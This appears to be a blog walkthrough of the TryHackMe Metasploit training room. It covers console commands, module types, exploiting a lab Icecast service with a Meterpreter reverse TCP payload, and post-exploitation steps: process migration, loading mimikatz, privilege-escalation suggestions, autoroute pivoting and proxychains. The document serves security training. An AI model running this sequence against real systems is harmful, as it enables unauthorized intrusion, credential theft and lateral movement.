Metasploit - TryHackMe Room

 
metasploit.png
 

The link for this lab is located here: https://tryhackme.com/room/rpmetasploit


In this room, we will learn how to use Metasploit - an incredible popular framework used by security professionals used to probe and exploit vulnerabilities.


Task 1 - Introduction

Metasploit is a powerful tool. Maintained by Rapid7, Metasploit is a collection of not only thoroughly tested exploits but also auxiliary and post-exploitation tools. Throughout this room, we explore the basics of using the framework and a few of the modules it includes.


Task 2 - Initializing

First things first, you need to initialize the database. To do that, use the "msfdb init" command

msfdbinit.png

Before starting Metasploit, you can view some of the advanced options to trigger for starting the console via the "msfconsole -h" command

helpmsf.png

To start the Metasploit console, simply type "msfconsole". If you don't want the banner, simply add the "-q" option.

removebanner.png

After metasploit has started, we can check that we are connected to the database via the "db_status" command.

dbstat.png

Now that we are connected to the database, we can see that Metasploit uses a PostgreSQL database.


Task 3 - Rock ‘em to the Core [Commands]

On the Metasploit prompt, we can type the "help" command.

msfhelp.png

The help menu has a very short one-character alias which is "?".

questionmark.png

Finding various modules we have is one of the most common commands we will leverage. The base command we use for searching is very simple - "search"

search.png

Once we have found the module, we use the "use" command to active that module.

use.png

If you want to view information about either a specific module or just the active one, use the "info" command

info.png

Metasploit also has a built-in netcat like function where we can make a quick connection with a host simply to verify that we can talk to it. This command is "connect"

connect.png

If you wanted to display the banner ASCII art for fun, simply type "banner"

banner.png

Two of the most used commands in Metasploit are "set" and "setg". The set command is used to change the value of a variable and the setg command is used to set the value of a global variable.

setg.png

To view the variables you have changed, use the "get" command

get.png

If you wanted to change the value of a variable to null or no value, use the "unset" command

unset.png

When performing a pen test, it is quite common to record your screen either for further review or for providing evidence of any actions taken. It is often coupled with the collection of console output to a file as it can be incredibly useful to grep for different pieces of information output to the screen.

The "spool" command can be used to set the console output to save to a file.

spool.png

Leaving a Metasploit console running is not always convenient and it can be helpful to have all the previously set values load when starting up Metasploit. The "save" command can be used to store the settings/active datastores from Metasploit to a settings file.

save.png

Task 4 - Modules for Every Occasion

Metasploit consists of six core modules that make up the bulk of the tools you will utilize within it.

architecture.png

The most common module that is utilized is the "exploit" module which contains all of the exploit code in the Metasploit database.

The "payload" module is used hand in hand with the exploits - they contain the various bits of shellcode we send to have executed, following exploitation.

The "auxiliary" module is commonly used in scanning and verification tasks that verify whether a machine is vulnerable to a specific exploit.

One of the most common activities after exploitation is successful is looting and pivoting. The "post" module provides these capabilities to users.

Finally, the "nop" module is used with buffer overflow and ROP attacks - a more advanced module.

However, not every module is loaded by default. To load extra modules, use the simple "load" command.


Task 5 - Move That Shell

Up until this point, we haven't done anything physically. First, we can deploy the machine and start scanning it from inside the Metasploit framework itself using the following command - db_nmap -sV [IP]

scandb.png

Looking at the results, nmap identified the msrpc service running on port 135. To see what information we have collected in the database, we can use the "hosts" command inside msfconsole.

hosts.png

Or, we can try the "services" command aswell

services.png

Finally, we can try the "vulns" command.

vulns.png

It is worth noting that Metasploit will keep a track of discovered vulnerabilities. Now that we've scanned the machine, we can try connecting to it with a Metasploit payload.

First, we search for the target payload. In MSF5 and MSF6, you can simply type "use" followed by a unique string found within only the target exploit. For example - "use icecast"

icecast.png

Metasploit then uses the found payload and automatically fills in the full path - exploit/windows/http/icecast_header

While the "use" command with the unique string can be useful, it is NOT the exploit we want. Instead, try running the "search multi/handler" command

handler.png

Once found, we can simply type "use 5" to use that specific payload. The "#" column specifies the number we can type out

used.png

Now, we can type the command "set PAYLOAD windows/meterpreter/reverse_tcp". This way, we can modify which payload we want to use with the exploit. Additionally, running the command "set LHOST [IP]" sets the IP to our VPN IP address.

Returning to the previous exploit by using "use icecast" we can then set the RHOSTS option to the target machine's IP to tell Metasploit which target to attack

iceRHOSTS.png

Once the variables are set, you can run the exploit by typing "run"

run.png

Once the connection is established, we can list all the sessions using the command "sessions". Similiarly, we can interact with a target session using the command "sessions -i [number]"

sessions.png

Task 6 - We’re In, Now What?

Now that we have a shell on the machine, we can start some post-exploitation modules. First thing is the initial shell is NOT very stable. To attempt to move to a different process, we first list the processes using the "ps" command.

ps.png

Then, to move to a different process we use the "migrate" command followed by the process ID of the running process we want to move to.

migrate.png

Sometimes the migration will fail because we do not have the specified privileges. To find out more information about the system to potentially escalate privileges, we can use the "getuid" command

getuid.png

To find out information about the system itself, we can run the "sysinfo" command

sysinfo.png

If we want to load mimikatz to use it, we use the "load kiwi" command

loadkiwi.png

To figure out the privileges of our current user, we use the "getprivs" command

getprivs.png

If we wanted to upload a file to the remote machine, we can use the "upload" command

If you want to run a Metasploit module, we use the "run" command

The "ipconfig" command can be run to figure out networking information and the interfaces on a remote machine.

ipconfig.png

We can run a few post exploitation modules from Metasploit. First, we can run the "/post/windows/gather/checkvm" command which determines if we are in a VM - useful for further pivoting.

vmcheck.png

Next we can try running "post/multi/recon/local_exploit_suggester" which checks for various exploits which we can run within our session to elevate our privileges.

localexploit.png

Finally, we can try forcing RDP to be enabled - it won't work since we aren't admins but is good to know about

rdp.png

As a quick note, if you want to drop down into a normal system shell, simply use the "shell" command


Task 7 - Makin’ Cisco Proud

Lastly, we can take a look at the autorouting options available in Metasploit. While this victim machine does not have multiple network interfaces, it is good to know about.

Running the "run autoroute -h" pulls up the help menu for autoroute.

autoroute.png

The "run autoroute -s 172.18.1.0 -n 255.255.255.0" command will add a route to the 172.18.1.0/24 network

Additionally, we can start a SOCKS5 proxy server out of this session. Backgrounding the meterpreter session and running the command "search server/socks" reveals the module

socksmod.png

Once we have started a SOCKS server, we can modify the "/etc/proxychains.conf" file to include the new server. The "proxychains" prefix to any command will run them through the SOCKS5 server with proxychains

proxychains.png

Previous
Previous

Blue - TryHackMe Room Writeup

Next
Next

Active Directory Basics Room